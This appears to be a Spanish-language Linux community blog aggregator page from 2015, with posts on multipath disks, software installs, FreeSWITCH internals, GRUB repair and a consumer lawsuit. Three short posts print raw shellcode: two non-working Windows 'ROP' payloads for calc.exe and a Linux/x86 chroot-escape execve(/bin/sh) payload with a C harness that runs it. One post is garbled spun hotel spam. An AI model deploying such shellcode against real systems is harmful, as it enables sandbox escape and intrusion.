 ├─vg_root-lv_swap (dm-6) 253:7 0 16G 0 lvm [SWAP]
 ├─vg_root-lv_tmp (dm-11) 253:12 0 10G 0 lvm /tmp
 └─vg_root-lv_usr (dm-12) 253:13 0 10G 0 lvm /usr
sdc 8:96 0 300G 0 disk
└─mpatha (dm-0) 253:2 0 300G 0 mpath
 ├─mpathap1 (dm-2) 253:3 0 10M 0 part
 ├─mpathap2 (dm-3) 253:4 0 1G 0 part /boot
 └─mpathap3 (dm-4) 253:5 0 263.3G 0 part
 ├─vg_root-lv_opt (dm-7) 253:8 0 10G 0 lvm /opt
 ├─vg_root-lv_var (dm-8) 253:9 0 10G 0 lvm /var
 ├─vg_root-lv_home (dm-9) 253:10 0 10G 0 lvm /home
 ├─vg_root-lv_usrlocal (dm-10) 253:11 0 10G 0 lvm /usr/local
 ├─vg_root-lv_root (dm-5) 253:6 0 10G 0 lvm /
 ├─vg_root-lv_swap (dm-6) 253:7 0 16G 0 lvm [SWAP]
 ├─vg_root-lv_tmp (dm-11) 253:12 0 10G 0 lvm /tmp
 └─vg_root-lv_usr (dm-12) 253:13 0 10G 0 lvm /usr
sdd 8:144 0 300G 0 disk
└─mpatha (dm-0) 253:2 0 300G 0 mpath
 ├─mpathap1 (dm-2) 253:3 0 10M 0 part
 ├─mpathap2 (dm-3) 253:4 0 1G 0 part /boot
 └─mpathap3 (dm-4) 253:5 0 263.3G 0 part
 ├─vg_root-lv_opt (dm-7) 253:8 0 10G 0 lvm /opt
 ├─vg_root-lv_var (dm-8) 253:9 0 10G 0 lvm /var
 ├─vg_root-lv_home (dm-9) 253:10 0 10G 0 lvm /home
 ├─vg_root-lv_usrlocal (dm-10) 253:11 0 10G 0 lvm /usr/local
 ├─vg_root-lv_root (dm-5) 253:6 0 10G 0 lvm /
 ├─vg_root-lv_swap (dm-6) 253:7 0 16G 0 lvm [SWAP]
 ├─vg_root-lv_tmp (dm-11) 253:12 0 10G 0 lvm /tmp
 └─vg_root-lv_usr (dm-12) 253:13 0 10G 0 lvm /usr
[root@server ~]#

Después de realizar las pruebas pertinentes de escritura, desconectando y reconectando cada path, es hora de bailar! 😀

Ver en Youtube

Les comparto la documentación de Red Hat al respecto:

Moving root File Systems from a Single Path Device to a Multipath Device

Espero les sirva…

Grabar tu escritorio con SimpleScreenRecorder en Ubuntu

SimpleScreenRecorder es un screencaster de código abierto disponible para cualquier distribución linux. En mi opinión es el mejor que he probado, permite elegir, formato de salida, resolución, seleccionar desde cual dispositivo de audio se va a grabar, tiene bastantes opciones interesantes, solo le falta la opción que permita mostrar tu webcam al mismo tiempo, para poder salir en tus screencast.

La instalación es sumamente sencilla

Lo primero es agregar el repositorio

sudo add-apt-repository ppa:maarten-baert/simplescreenrecorder

Actualizar nuestra lista de paquetes locales

sudo apt-get update

Y por ultimo instalar simplescreenrecorder

sudo apt-get install simplescreenrecorder

Si quisiéramos grabar nuestras partidas de juegos que utilicen OpenGL y sean de 32bits y nuestro sistema es de 64bits, tienes que instalar la libreria de 32bits

sudo apt-get install simplescreenrecorder-lib:i386

Aquí les dejo un pequeño video, donde doy un tour por las opciones de SimpleScreenRecorder y grabo un video, donde abro el video que estoy grabando y se genera un loop

Lunes 23 de noviembre de 2015

José Mendoza Roa

José Mendoza Roa
Tucancunix Blog

Classifying Fragmented Addiction: Hotels in the Colony

They can opt from our tailor manufactured companies which consist of air ticket booking, arranging vacation insurance policies insurance policies, and a lot of much more this kind of options to choose from. Fine wines are served with delightful and sophisticated dishes. And because you can up grade your flight to consist of a landing tour, you can customize the journey of a life time you happen to be positive to get pleasure from. Company vacationers will uncover a quantity of company-pleasant establishments, including convention heart hotels. If you have a quite distinct budget, no issue, just enter the price parameters you can pay for.

No matter whether you are searching to host a customer, get in contact with the business office, or polish off a presentation, these business amenities are just what you require. Study suggests that sixty one% of resort bookings are manufactured straight via resort sites. Com delivers an online resort booking to meet your holiday needs with inexpensive resort offers. One more benefit of keeping at this Manali resort is the proximity to Mall road and Manali Main Market place.

Pune is one particular of the very best examples of a perfect mix of present day and classic place. 1 would say it is amid the couple of paradise settings located in Europe. Besides, the town is also regularly visited by rock climbers, trekkers, and journey buffs. There are numerous factors that have to be regarded ahead of booking a resort room.

In addition, 4 Seasons characteristics with spas, point out-of-the-artwork health centres and terraces. The excellent issue is most of the lodging options are fitted with latest facilities. Individuals searching to get pleasure from the city?s nightlife and fine delicacies will uncover that there are a lot of Hong Kong hotels that are located flawlessly for this kind of exploration. There are hundreds of establishments to choose from, every single supplying a exclusive continue to be. Website visitors can get pleasure from a peaceful stroll or pleasant bike journey, as properly as the perfect location for sunbathing on a scorching working day.

When you phone and go to reception be positive to talk about your specific situation, anniversary marriage or otherwise. So following time when you are heading to program your holiday to save oneself, your associate, pals or family members from scorching heat of the plains of Haryana and Punjab, program with resort whispering winds for an excellent and incredible holiday knowledge. The resort has 400 rooms and suites, a twenty five meter outside infinity swimming pool, a luxury spa, and health centre. The ideal place to check out Hong Kong from previously mentioned can be found on Victoria Peak, which characteristics amazing sights during daylight and when the town is illuminated at nighttime. Some hotels have meeting companies and assembly rooms and encourage groups to maintain conventions and conferences at their location.

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

Viernes 20 de noviembre de 2015

Emerson Posadas

Emerson Posadas
toxickore BLOG

Remove proxy or add no_proxy for API endpoint creation.

Beware of creating openstack API endpoints on the controller using proxy environment variables. This is why:

# openstack service create \
>   --name keystone --description "OpenStack Identity" identity
ERROR: openstack Not Found (HTTP 404)

You will need to remove the proxy environment variables or add your controller hostname into the no_proxy environment variable:

# export no_proxy=localhost,127.0.0.0/8,controller

That will resolve the 404 Apache error.
Héctor Daniel Cortés

Héctor Daniel Cortés
'Aztec Eagle' Turbo

Fin del segundo tiempo

En la casa de reposo

Jueves 19 de noviembre de 2015

Carlos Augusto Lozano

Carlos Augusto Lozano
tail -f /dev/mind > blog

Windows 7 SP1 ROP shellcode for calc.exe

Noup… also it doesn't work -_-U

shellcode=“\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B”

“\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B”

“\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31”

“\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA”

“\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14”

“\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65”

“\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC”

Moisés Silva

Moisés Silva
Moy Blog

FreeSWITCH Internals Notes

At Sangoma we use FreeSWITCH as a communications development platform. I decided to write some notes and guide lines on the FreeSWITCH internal architecture so our developers can use the FreeSWITCH framework effectively. I decided to publish them here as well so they’re useful to others developing modules or core enhancements for FreeSWITCH.

Core

The FreeSWITCH core is contained in the src/*.c files, everything that you see there is considered “core”. The FreeSWITCH core provides common services and protocols that are re-used among many different call control or media protocols. For example, the core provides several useful API abstractions:

  • OS abstraction based on top of the APR project (Apache Portable Runtime). There is a thin layer of abstraction (src/switch_apr.c) that prevents introducing a direct dependency between the rest of the system and the APR library. This means the rest of the system *DOES NOT* use APR directly, they use the API exposed in src/switch_apr.c for operating system abstraction primitives to create sockets, threads, manage memory etc.
  • RTP stack (src/switch_rtp.c) and an API to create rtp streams, read/write to them etc. This provides access to RTP as RTP is used by many other signaling protocols such as SIP, H.323, Megaco etc, so it makes sense to have it in the core.
  • Call switching (src/switch_ivr.c, src/switch_ivr_originate.c) API routines to create a new call (session) towards a destination without explicitly knowing the low-level protocol details. A module can therefore use switch_ivr_originate() API to place a call in SIP, H.323, SS7, PRI etc, using the same consistent API provided by the core.
  • Media playing API (src/switch_ivr_play_say.c, src/switch_ivr_say.c) that allows you to play a file, insert tones etc etc on a given session (regardless of the signaling protocol)
  • Session and channel management (src/switch_core_session.c, src/switch_channel.c) that allows to perform call control operations (answer a channel, hangup a channel) and low-level I/O operations (write a frame of media, read a frame of media) on sessions (regardless of the underlying signaling and media protocols).

fs_architecture
(Image taken from the FreeSWITCH wiki long ago, can’t recall the URL anymore)

Sessions and Channels

The core abstraction for a call leg is the switch_core_session_t opaque structure. This contains all the necessary information for a given call leg. The session contains a channel. The channel is simply a lower-level representation of the call leg that contains information about the underlying protocols and data structures used to interface with that call leg (ie, contains function pointers to functions that allow the call to be answered, hangup, provide media etc) and the state of the session.

Sessions in FreeSWITCH live in their own thread. A typical call involves 2 sessions (the inbound session and then an outbound session, both of them “bridged”). Each session lives in its own thread, looping through a finite state machine (the session channel states go from CS_INIT, last state is CS_DESTROY, there are other states such as CS_ROUTING, CS_EXCHANGE_MEDIA etc etc. These states determine what the session is doing, each of the state handlers to perform the operation (ie, hangup) is executed in the session thread. It is possible however that other threads want to send a message to indicate something, or read/write information about a session in it. In order to do this in a safe way, there are several APIs that can be used to get a locked pointer to a session that allows you to peek into the session data safely without fearing the session thread will terminate and destroy the session while you’re looking at it or doing something with it from another thread, the main core function for this is:

switch_core_session_t *switch_core_session_locate(const char *uuid);

Every session has a UUID (universal identifier) that is unique across computers and across time (at least for practical purposes). You can use that UUID to ask the core to find a session in the system with that UUID. The core will attempt to find the session (in an internal hash table) and if it’s found, it will lock it and return it to you. You can then use the session to retrieve data, set data or perform operations on it or in its underlying switch_channel_t (which is obtained through switch_core_session_get_channel()) without fear of the session thread to destroy the session (for example if someone sets the state to CS_DESTROY). You must remember to unlock the session when done, and you should do that fast enough (not more than a few milliseconds) otherwise you’re blocking other threads from accessing that session if they need to do something with it. Unlock the session with:

switch_core_session_rwunlock();

This function unlocks the session and this releases it so other threads can use it (including destroy it).

Be aware that there are other core functions that return a session locked, such as switch_core_session_get_partner(). It is your responsibility to verify if the function you are using returns a locked session and then use switch_core_session_rwunlock() to unlock it when done.
Modules

FreeSWITCH is highly modular. The FreeSWITCH engine/core source code is contained in the src/ directory. The plugins or modules source code are contained in the src/module/ directory (the only exception is mod_freetdm, which is contained at libs/freetdm/mod_freetdm, there are some legacy reasons why this was done this way, but there is talks in the FreeSWITCH open source community about moving it to the right place in src/mod/endpoints/ folder).

There are different types of modules/plugins (in the future, I’ll refer to them simply as modules). There are endpoints, formats, loggers, event handlers, dialplans, TTS engines etc etc. Pretty much every directory under src/mod/ is a type of module. Each type of module registers an “interface” with the FreeSWITCH core. Great care has been taken to make proper abstractions and do not expose “module-specific” data into the FreeSWITCH core (src/*.c) files. The modules make use of FreeSWITCH core API primitives to request core services, the FreeSWITCH core uses the abstract interface exposed by different type of modules for performing operations. For example, the module mod_sofia is an endpoint module. Therefore mod_sofia code is contained at src/mod/endpoints/mod_sofia/

FreeTDM

The FreeTDM library is a modular API that allows applications to initialize different types of TDM/Analog signaling stacks, place/receive calls and read/write media. It supports signaling modules for SS7, ISDN(PRI/BRI), Analog, MFCR2 etc. It also supports a I/O modules to support multiple different hardware manufacturers. The 2 most prominent I/O modules are src/ftmod/ftdm_wanpipe/ftmod_wanpipe.c (For Sangoma Wanpipe cards) and the src/ftmod/ftmod_zt/ftmod_zt.c (For DAHDI-enabled cards such as Sangoma and Digium).

The FreeTDM project is part of the same source tree as FreeSWITCH, however FreeTDM does not depend on FreeSWITCH. FreeSWITCH also does not depend on FreeTDM, the glue that links them together is mod_freetdm, which is an endpoint module for FreeSWITCH that allows FreeSWITCH to place calls in SS7, PRI, MFC-R2 and Analog telephony networks. Note that the mod_freetdm module is just a plugin/extension to FreeSWITCH and it is a “user” of the freetdm library. As such, you should never expose internal opaque details of freetdm to mod_freetdm or worst, to FreeSWITCH. The freetdm.h header is the main public header that is used by freetdm API users. There are other headers under a private/ folder in freetdm that are not meant to be used by the API users, only for internal use of other freetdm C files/components.

Memory Allocation

When allocating memory within FreeSWITCH you must ask yourself where to allocate from. FreeSWITCH uses APR memory pools (wrapped on the switch_memory_pool_t) data structure. You can request a completely new memory pool for yosuelf, but that may be a waste, instead ask yourself whether the memory you’re allocating will be associated to a particular session (call leg) and whether needs to persist. For example, memory for a data structure to keep track of RTCP statistics of an RTP stream, will always be associated to the RTP stream, which in turn is associated to the session. In such cases it is recommended to use the session memory pool, which is automatically destroyed at the end of the call.

In the other hand, if the memory you are allocating must persist beyond the call life cycle, you will be better off requesting a new memory pool and then allocating from it, but now you’re responsible to destroy the pool when you’re done with your object life cycle. Remember it is not possible to free memory allocated from a pool until you destroy the whole pool completely.

Some functions to remember (from src/include/switch_core.h and src/switch_core_memory.c):

switch_core_session_get_pool() – Returns the memory pool associated with a given session
switch_core_session_alloc() – Allocate x amount of bytes from a given session memory pool
switch_core_session_sprintf() – Allocates a new string with the provided format using the session memory pool
switch_core_session_strdup() – Duplicates a new string using the session memory pool
switch_core_new_memory_pool() – Creates a new pool ready to start allocating objects
switch_core_destroy_memory_pool() – Destroy the given pool, you better be sure no one will be needing any of the objects allocated from that pool
switch_core_alloc() – Allocate memory from a given memory pool
switch_safe_free() – Free memory allocated directly using malloc()/calloc(), testing for NULL pointer
For all the session-related allocation functions, you must be sure the allocated object will NOT outlive the session.

Remember all switch allocation functions already initialize memory, you do not need to call memset() after allocation

There are a few cases where it’s justifiable to use standard memory allocation functions such as strdup()

strdup() is ok when you need a quick duplicate of another string but you have no session pointer or it’s something called often and short-lived, and therefore you do not want to use the session pointer with switch_core_session_strdup() because that would leave the memory allocated until the end of the call

String Manipulation

switch_copy_string() – Safely copy a string, use this instead of strcpy() or strncpy(). It will guarantee the output is null-terminated.
switch_set_tring() – Use this to initialize a string buffer of a fixed length. DO NOT USE THIS with char* pointers as the implementation uses sizeof() and sizeof(char*) is only 4 or 8!!
switch_toupper() – Convert a string to uppercase
switch_strstr() – Find a string in a substr
switch_safe_atoi() – Turn a string into a number, testing for NULL and defaulting to a given value in case of NULL
More gems can be found in src/include/switch_utils.h, please check there before hand-coding your own function or check if you can use one from switch_utils.h instead of using direct libc functions!!

Booleans

switch_true() – Use this to test if a string is true (ie, “true”, “enabled”, “on”, etc, all are considered true), this is useful when parsing configuration files
switch_false() – Use this to test if a string is false (ie “false”, “disabled” etc), this is useful when parsing configuration files
SWITCH_TRUE / SWITCH_FALSE – Use this along with switch_bool_t instead of using integers

Miércoles 18 de noviembre de 2015

Instalar Google Chrome en Debian/Ubuntu

Google Chrome es un navegador desarrollado por google, actualmente es uno de los navegadores mas utilizados, tiene una versión para Linux, Mac OS y Windows, a continuación vamos a ver los pasos para la instalación en Debian y Ubuntu.

Lo primero que debemos hacer es agregar la llave publica de google

wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -

Ahora agregamos la linea para el repositorio de Chrome

sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google-chrome.list'

Ahora actualizamos la lista de paquetes

sudo apt-get update

Para instalar la versión estable basta con ejecutar

sudo apt-get install google-chrome-stable

Si deseamos probar la versión beta

sudo apt-get install google-chrome-beta

Pero si nos sentimos con suerte y deseamos probar la ultima beta

sudo apt-get install google-chrome-unstable

 

 

 

 

 

Martes 17 de noviembre de 2015

Carlos Augusto Lozano

Carlos Augusto Lozano
tail -f /dev/mind > blog

ROP shellcode test

Noup… it doesn't work =/ … if anyone have any idea, write me vendetta {at} bugcon {dot} org

(Written in perl… dots, dots and strings, only for testing purposes)

my $shellcode =

“\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a” .

“\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59” .

“\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41” .

“\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42” .

“\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51” .

“\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49” .

“\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46” .

“\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c” .

“\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45” .

“\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48” .

“\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47” .

“\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48” .

“\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47” .

“\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e” .

“\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49” .

“\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48” .

“\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49” .

“\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49” .

“\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e” .

“\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a” .

“\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42” .

“\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44” .

“\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e” .

“\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b” .

“\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51” .

“\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43” .

“\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50” .

“\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x30\x4b\x4f\x51” .

“\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50” .

“\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c” .

“\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48” .

“\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e” .

“\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b” .

“\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50” .

“\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e” .

“\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51” .

“\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50” .

“\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43” .

“\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43” .

“\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50” .

“\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48” .

“\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46” .

“\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e” .

“\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45” .

“\x5a\x41\x41”;

Domingo 15 de noviembre de 2015

Xenode Systems: ¿Qué hacer después de instalar OpenSUSE 42.1 Leap?
Xenode Systems: ¿Qué hacer después de instalar Fedora 23? (Workstation/Server)

Viernes 13 de noviembre de 2015

Alex Callejas

Alex Callejas
|rootzilopochtli.com|

HP Red Screen Of Death

Hacía tiempo que la Muerte Roja devastaba el país. Nunca hubo peste tan mortífera ni tan horrible. La sangre era su emblema y su sello, el rojo horror de la sangreLa Máscara de la Muerte Roja de Edgar Allan Poe

imgo

Ayer un cliente me solicitó apoyo, ya que, después de un reinicio de sanidad, su server no arrancaba y le aparecía una pantalla roja con un mensaje de error:

Illegal OpCode

Buscando un poco en google, encontré que este mensaje tenía dos escenarios:

Recordando el proceso de arranque del sistema:

linux boot process

Todo indicaba que, por alguna razón (aunque el inge de HP no lo admitía), el disco había modificado algún identificador y la BIOS no encontraba el MBR, por lo que GRUB no iniciaba, enviando la famosa pantalla roja. La solución más rápida, entonces, era reinstalar GRUB.

Después de un buen rato, ya que convencí al inge de HP que actualizará la ILO porque su certificado estaba caducado, pude conectarme a la consola remota e iniciar la reinstalación:

1. Con el disco de instalación, ejecute el linux rescue:

Screenshot from 2015-11-13 12-18-36

2. Después de seleccionar el idioma, el teclado y que no utilizará las interfaces de red, el sistema rescate buscaría en el disco la instalación y lo montaría en un path temporal de trabajo:

Screenshot from 2015-11-13 12-20-13

Screenshot from 2015-11-13 12-20-30

3. Tras una breve revisión, encontramos el dispositivo donde debería encontrarse GRUB:

Screenshot from 2015-11-13 12-22-47

4. Al ejecutar el comando para reinstalar GRUB, mandaba un mensaje de error:

sh-3.2# grub-install /dev/vda1
The file /boot/grub/stage1 not read correctly

5. Para solucionar este mensaje, se desmontó la partición y se ejecutó un fsck:

Screenshot from 2015-11-13 12-27-53

6. Después de reparar error, remontamos la partición y se realizó un respaldo del directorio /boot:

sh-3.2# tar czvf boot.bkp.tar.gz boot/

Screenshot from 2015-11-13 12-34-11

7. Desmontamos nuevamente y se formateo la partición como ext3 :

Screenshot from 2015-11-13 12-35-17

8. Restauramos el respaldo y realizamos nuevamente la instalación de GRUB:

sh-3.2# tar xzvf boot.bkp.tar.gz
...
sh-3.2# 
sh-3.2# grub-install /dev/vda1
The file /boot/grub/stage1 not read correctly

9. Como el error se mantenía, ejecutamos la instalación sin grub-install y reiniciamos el server:

sh-3.2# grub 
grub> root (hd0,0)
grub> setup (hd0)
grub> quit
sh-3.2# reboot

10. Al reiniciar, el server ya cargaba GRUB, pero mando un mensaje de error:

Screenshot from 2015-11-13 12-47-41

Screenshot from 2015-11-13 12-48-47

11. Este error se debía a que en el archivo /etc/fstab el montaje de /boot apuntaba a la etiqueta del dispositivo marcado como /boot. Como formateamos esa partición, la etiqueta ya no correspondía con el UUID del dispositivo. Para solucionarlo, volvemos a montar el disco de rescate y editamos el archivo /etc/fstab, apuntándolo al dispositivo correctamente:

Screenshot from 2015-11-13 12-50-50

Screenshot from 2015-11-13 12-51-44

12. Al reiniciar, el server ya arrancaba de forma correcta:

Screenshot from 2015-11-13 12-56-09

Screenshot from 2015-11-13 12-57-23

Este caso requirió de mucho análisis ya que, aunque la respuesta se veía sencilla, tuvo complicaciones que la hicieron más compleja y quise compartir con ustedes como la solucionamos.

Les comparto, además, los artículos de la KB de Red Hat utilizados:

HP server fails to boot, getting a Red Screen with Illegal Opcode
HP Server will not boot – Illegal Opcode
How to re-install GRUB bootloader on the Master Boot Record(MBR) in rescue mode?
How to fsck in rescue mode for Red Hat Enterprise Linux
‘grub-install’ fails with error ‘The file /boot/grub/stage1 not read correctly.’

Espero les sirva…

Plus: Como es el Buen Fin en México, como una oferta, como una promoción les vengo ofreciendo de manera gratuita el texto mencionado en el intro. Espero les guste 😉

Jueves 12 de noviembre de 2015

Antonio de Dios

Antonio de Dios
Linux – Webadedios

pantallazo de mi escritorio 2015

hace 2 años que no pongo nada de como luce mi escritorio, hoy pongo algunas capturas

prácticamente no lo he movido en el año, kde5 plasma con brisa oscuro

mi escritoro diciembre 2015Captura de pantalla_2015-11-09_23-50-12

mi escritorio 2015mi escritorio dic 2015

escitorio 2015escritorio 2015

luego subo las fotos de mi escritorio en entorno xfce4, que son los dos que utilizo

Miércoles 11 de noviembre de 2015

Gerónimo Orozco

Gerónimo Orozco
Patux's booring news

De Marconi a Zaqar, la evolución del sistema de mensajería y notificaciones

Registrate





¿Has escuchado sobre el proyecto Marconi? ¿y sobre Zaqar? Estamos hablando de un mismo proyecto, pero la versión de hoy en día no se parece a nada a sus orígenes. En esta presentación haremos una breve introducción al sistema de mensajería y notificaciones de OpenStack, cuales son sus principales funcionalidades y proveeremos algunos casos de uso. Finalmente presentaremos las nuevas funcionalidades agregadas en el release Liberty de OpenStack y charlaremos sobre los futuros planes del proyecto

Lunes 09 de noviembre de 2015

Carlos Augusto Lozano

Carlos Augusto Lozano
tail -f /dev/mind > blog

Linux/x86 break chroot execve(/bin/sh) [80 bytes]

char pambazo[]=“\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x36\x5e\x88\x46\x0a” “\x8d\x5e\x05\xb1\xed\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x83” “\xc3\x02\xb0\x0c\xcd\x80\xe0\xfa\xb0\x3d\xcd\x80\x89\x76\x08\x31” “\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x89\xc2\xb0\x0b” “\xcd\x80\xe8\xc5\xff\xff\xff/bin/sh..”;

int main(){

int *ret=(int *)(&ret+2);

printf(“len : %d\n”,strlen(pambazo));

*ret=(int)pambazo;

}

Domingo 08 de noviembre de 2015

Rigoberto Calleja

Rigoberto Calleja
Apuntes de Rigoberto Calleja

Acción de grupo promovida por la Procuraduría Federal del Consumidor contra Nokia México, S. A. de C. V.

A partir del año de dos mil ocho la Procuraduría Federal del Consumidor empezó a radicar quejas a nivel nacional de consumidores inconformes con el hecho de que dicho proveedor se abstenía de hacer efectiva la garantía de teléfonos celulares que adquirieron y presentaron defectos en su funcionamiento.

El dieciocho de febrero de dos mil diez, la Procuraduría Federal del Consumidor, en representación de los consumidores afectados, presentó demanda de acción de grupo en contra del proveedor, acompañando en vía de prueba, copia certificada de los ciento veintiún expedientes administrativos de dichas quejas, en la que reclamó el pago del precio del teléfono que cada consumidor adquirió, por concepto de daños y perjuicios; y una indemnización no inferior al veinte por ciento de dicho valor. La parte actora sostuvo que los teléfonos celulares que cada consumidor adquirió de la parte demandada resultaron inadecuados para el uso al que estaban destinados.

De los ciento veintiún procedimientos conciliatorios:

  • En tres de ellos el proveedor no se presentó a la audiencia de conciliación.
  • Ochenta y cuatro concluyeron sin que las partes llegaran a una conciliación por lo que la autoridad administrativa determinó dejar a salvo los derechos de las partes, de éstos:
    • En once casos el proveedor solicitó que se le hiciera llegar el equipo para revisarlo, sin embargo, no dio respuesta.
    • En cuatro casos, el proveedor se negó a conciliar con el consumidor.
  • Los treinta y cuatro restantes concluyeron con la celebración de un convenio conciliatorio en el que el proveedor se obligó a reparar o reponer el equipo, sin embargo, lo incumplió.

El Juez de la causa dictó sentencia el quince de abril de dos mil once en la que determinó que:

  1. La acción era improcedente ya que los derechos reclamados no tenían origen común porque en realidad existían diversas causas de pedir en virtud de que los procedimientos conciliatorios no se referían a un hecho en común.
  2. Dividir el análisis de la acción hubiera ocasionado que la sentencia fuera favorable para unos consumidores y desfavorable para otros lo que sería contrario a la naturaleza de aquélla.
  3. En consecuencia, dejó a salvo los derechos de los consumidores para que los hicieran valer en la forma que estimaran conveniente.

Inconforme, la parte actora interpuso recurso de apelación mismo que fue resuelto el catorce de junio de dos mil once en los siguientes términos:

  • No era cierto que la acción fuera improcedente porque los derechos reclamados no tuvieran origen común ya que con independencia de que la conducta de la parte demandada en los procedimientos administrativos no fue la misma, la pretensión tuvo como base la vulneración al mismo derecho de los consumidores.
  • La parte actora debía acreditar, en primer lugar, la realización de una conducta de la parte demandada que causó daños a los consumidores y, en segundo, que ésta no hubiera resarcido esa merma patrimonial.
  • Respecto del primer elemento determinó que quedó demostrado con las quejas presentadas ya que evidenciaban que los consumidores solicitaron que la parte demandada les hiciera válida la garantía de su equipo y en ningún caso obtuvieron respuesta favorable, por lo que quedaba acreditado que ésta inobservó el deber jurídico impuesto por el artículo 77 de la Ley Federal Protección al Consumidor. Agregó que lo anterior se corroboraba con la prueba confesional de la parte demanda en la que fue declarada confesa por no comparecer a su desahogo y de la que se desprendía que se abstuvo de hacer válida la garantía de los equipos. En este sentido precisó que aunque los equipos no presentaron el mismo defecto, en todos los casos la parte demandada se abstuvo de hacer válida la garantía.
  • Determinó que lo aseverado por la parte demandada en el sentido de que los defectos de los teléfonos fueron provocados por su mal uso, se analizaría en el incidente de reclamación de daños y perjuicios y ésta tendría la carga de demostrarlo.
  • Determinó que el segundo elemento se había demostrado porque la parte demandada no justificó haber reparado los daños y perjuicios.
  • Condenó a la parte demandada a pagar, en la vía incidental, a los perjudicados los daños y perjuicios que les hubiere causado mas una indemnización no menor al veinte por ciento del monto de éstos. Al respecto, precisó:
    • La sentencia tenía efectos ultra partes por lo que beneficiaba a todo consumidor que demostrara su calidad de perjudicado con independencia de que hubiera presentado queja ante la parte actora.
    • Sería hasta el incidente de liquidación de daños e indemnización, en la que se individualizaría la sentencia y se establecería la forma en que se repararía el daño.
    • La reparación del daño no consistiría, en todos lo casos, en el pago de una cantidad equivalente al valor del equipo, pues ese efecto es propio de una acción de rescisión, que presupone la existencia de un contrato sinalagmático, que de incumplirse por una de las partes, otorga el derecho a la parte que cumplió de rescindir el acto jurídico; y no una acción de grupo, que no depende de la existencia de un contrato y que persigue la reparación de los daños y perjuicios por hechos ilícitos causados en contra de consumidores.
    • La indemnización no se calcularía sobre el precio de los productos adquiridos, sino sobre el monto del daño causado.

